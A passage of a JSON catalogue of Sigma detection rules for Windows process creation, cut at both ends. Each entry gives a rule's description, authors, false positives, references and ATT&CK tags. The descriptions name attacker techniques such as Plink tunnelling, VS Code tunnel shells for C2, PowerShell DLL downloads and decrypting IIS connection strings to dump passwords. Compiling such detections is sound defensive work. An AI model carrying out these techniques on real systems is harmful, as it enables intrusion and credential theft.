"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ "attack.exfiltration", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", "value": "Exports Registry Key To a File" }, { "description": "Local accounts, System Owner/User discovery using operating systems utilities", "meta": { "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate administrator or user enumerates local users for legitimate reason" ], "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1087.001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "502b42de-4306-40b4-9596-6f590c81f073", "value": "Local Accounts Discovery" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_invocation_specific.yml", "level": "medium", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invocation_specific.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "536e2947-3729-478c-9903-745aaffe60d2", "value": "Suspicious PowerShell Invocations - Specific - ProcessCreation" }, { "description": "Detects execution of 7z in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-27", "falsepositive": [ "Legitimate use of 7z with a command line in which \".dmp\" or \".dump\" appears accidentally", "Legitimate use of 7z to compress WER \".dmp\" files for troubleshooting" ], "filename": "proc_creation_win_7zip_exfil_dmp_files.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "value": "7Zip Compressing Dump Files" }, { "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", "meta": { "author": "Florian Roth (Nextron Systems), Hieu Tran", "creation_date": "2023-03-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_download_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.t1059.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "value": "Potential DLL File Download Via PowerShell Invoke-WebRequest" }, { "description": "Detects the execution of a renamed \"gpg.exe\". Often used by ransomware and loaders to decrypt/encrypt data.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2023-08-09", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_renamed_gpg4win.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securelist.com/locked-out/68960/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec0722a3-eb5c-4a56-8ab2-bf6f20708592", "value": "Renamed Gpg.EXE Execution" }, { "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", "meta": { "author": "Konstantin 
Grishchenko, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", "https://twitter.com/pabraeken/status/993497996179492864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", "value": "Suspicious VBoxDrvInst.exe Parameters" }, { "description": "Detects execution of \"tar.exe\" in order to create a compressed file.\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), AdmU3", "creation_date": "2023-12-19", "falsepositive": [ "Likely" ], "filename": "proc_creation_win_tar_compression.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://unit42.paloaltonetworks.com/chromeloader-malware/", "https://lolbas-project.github.io/lolbas/Binaries/Tar/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_compression.yml" ], "tags": [ "attack.collection", "attack.exfiltration", "attack.t1560", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "418a3163-3247-4b7b-9933-dcfcb7c52ea9", "value": "Compressed File Creation Via Tar.EXE" }, { "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", "value": "Remote File Download Via Desktopimgdownldr Utility" }, { "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-07-15", "falsepositive": [ "Software installation" ], "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "970823b7-273b-460a-8afc-3a6811998529", "value": "Uncommon One Time Only Scheduled Task At 00:00" }, { "description": "Detects uncommon \"conhost\" child processes. This could be a sign of \"conhost\" usage as a LOLBIN or potential process injection activity.", "meta": { "author": "omkar72", "creation_date": "2020-10-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_conhost_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", "value": "Uncommon Child Process Of Conhost.EXE" }, { "description": "Detects installation of a new shim using sdbinst.exe.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims\n", "meta": { "author": "Markus Neis", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sdbinst_shim_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", "value": "Potential Shim Database Persistence via Sdbinst.EXE" }, { "description": "Detects audio capture via PowerShell Cmdlet.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate audio capture by legitimate user." ], "filename": "proc_creation_win_powershell_audio_capture.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/frgnca/AudioDeviceCmdlets", "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", "value": "Audio Capture via PowerShell" }, { "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "meta": { "author": "frack113", "creation_date": "2021-12-10", 
"falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpview.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", "https://github.com/tevora-threat/SharpView/", "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml" ], "tags": [ "attack.discovery", "attack.t1049", "attack.t1069.002", "attack.t1482", "attack.t1135", "attack.t1033" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "value": "HackTool - SharpView Execution" }, { "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "meta": { "author": "frack113", "creation_date": "2021-07-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_automated_collection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": 
[ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml" ], "tags": [ "attack.collection", "attack.t1119", "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", "value": "Automated Collection Command Prompt" }, { "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_iis_connection_strings_decryption.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", 
"value": "Microsoft IIS Connection Strings Decryption" }, { "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", "meta": { "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "creation_date": "2022-01-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml" ], "tags": [ "attack.privilege-escalation", "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", "value": "Whoami.EXE Execution From Privileged Process" }, { "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like \"C:\\windows\\system32\\davclnt.dll,DavSetCookie\".\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_webdav_client_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/17", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "value": "WebDav Client Execution Via Rundll32.EXE" }, { "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", "meta": { "author": "xknow @xknow_infosec, Tim Shelton", "creation_date": "2020-06-11", "falsepositive": [ "Java tools are known to produce false-positive when loading libraries" ], "filename": "proc_creation_win_cmd_path_traversal.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", "https://twitter.com/Oddvarmoe/status/1270633613449723905", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_path_traversal.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", "value": "Potential CommandLine Path Traversal Via Cmd.EXE" }, { "description": "Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. 
Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate use of Visual Studio Code tunnel and running code from there" ], "filename": "proc_creation_win_vscode_tunnel_remote_shell_.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://code.visualstudio.com/docs/remote/tunnels", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f4a623c2-4ef5-4c33-b811-0642f702c9f1", "value": "Visual Studio Code Tunnel Shell Execution" }, { "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-21", "falsepositive": [ "Benign scheduled tasks creations or executions that happen often during software installations", "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "filename": "proc_creation_win_schtasks_env_folder.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", "https://blog.talosintelligence.com/gophish-powerrat-dcrat/", "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81325ce1-be01-4250-944f-b4789644556f", "value": "Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE" }, { "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", "meta": { "author": "frack113", "creation_date": "2021-08-19", "falsepositive": [ "GPO" ], "filename": "proc_creation_win_reg_screensaver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_screensaver.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1546.002" ] }, "related": [ { "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", "value": "Suspicious ScreenSave Change by Reg.exe" }, { "description": "Detects suspicious Plink tunnel port forwarding to a local port", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-01-19", "falsepositive": [ "Administrative activity using a remote port forwarding to a local port" ], "filename": 
"proc_creation_win_plink_port_forwarding.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.lateral-movement", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48a61b29-389f-4032-b317-b30de6b95314", "value": "Suspicious Plink Port Forwarding" }, { "description": "Use of hostname to get information", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hostname_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hostname_execution.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "value": "Suspicious Execution of Hostname" }, { "description": 
"Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE\nCheck if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)\n", "meta": { "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Inventory tool runs", "Administrative activity" ], "filename": "proc_creation_win_net_groups_and_accounts_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml" ], "tags": [ "attack.discovery", "attack.t1087.001", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "value": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE" }, { "description": "Detects suspicious process run from unusual locations", "meta": { "author": "juju4, Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-01-16", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_rundll32_run_locations.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://car.mitre.org/wiki/CAR-2013-05-002", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_run_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "car.2013-05-002" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", "value": "Suspicious Process Start Locations" }, { "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).\n", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "WindowsApps installing updates via the quiet flag" ], "filename": "proc_creation_win_msiexec_install_quiet.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "value": "Msiexec Quiet Installation" }, { "description": "Detects the usage of emojis in the command line; this could be a sign of potential defense evasion activity.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": 
"proc_creation_win_susp_emoji_usage_in_cli_4.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_4.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "225274c4-8dd1-40db-9e09-71dff4f6fb3c", "value": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4" }, { "description": "Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel", "creation_date": "2023-08-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_provlaunch_provisioning_command.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25", "value": "Potential Provisioning Registry Key Abuse For 